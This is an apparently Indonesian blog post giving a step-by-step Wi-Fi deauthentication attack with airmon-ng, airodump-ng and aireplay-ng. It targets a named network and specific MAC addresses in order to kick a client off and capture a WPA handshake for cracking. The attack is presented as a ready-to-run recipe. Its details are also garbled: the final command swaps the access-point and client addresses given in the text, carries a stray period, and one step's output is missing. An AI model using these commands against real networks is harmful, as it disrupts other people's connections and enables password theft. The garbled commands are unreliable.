Linux, Networking, Ppentest

Wireless Deauth Attack!!

#Step 1 : Aktifkan Mode Monitor airmon-ng start wlan0

Output : Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)

Ok kita telah sukses sejauh ini , output pada terminal menunjukan bahwa monitor mode telah di aktifkan pada interface mon0.

 

#Step 2 : Menangkap (dump) traffik pada akses point target dan lalu lintas paket data antara AP dan client yang sedang terkoneksi. “airodump-ng mon0”

Output:

#Step 3: HandShake

Tujuan kita dalam capturing ini sebenarnya adalah mencari handshake. Untuk mendapatkan nilai handshake kita harus mendiskoneksikan client yang sudah terkoneksi dengan baik ke AP target. ok saya tertarik pada client yang telah terkoneksi dengan AP dengan ssid ( ibteam-3g ) dengan bssid F4:EC:38:EB:FA:C6. Kita gunakan fasilitas aireply untuk melakukan deauth attack pada user dengan Mac .  1C:4B:D6:AB:85:8E  .

 

#Step 4 : Serang..!!!!!

aireplay-ng --deauth 1 -a 1C:4B:D6:AB:85:8E  . -c F4:EC:38:EB:FA:C6 mon0

Standard

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s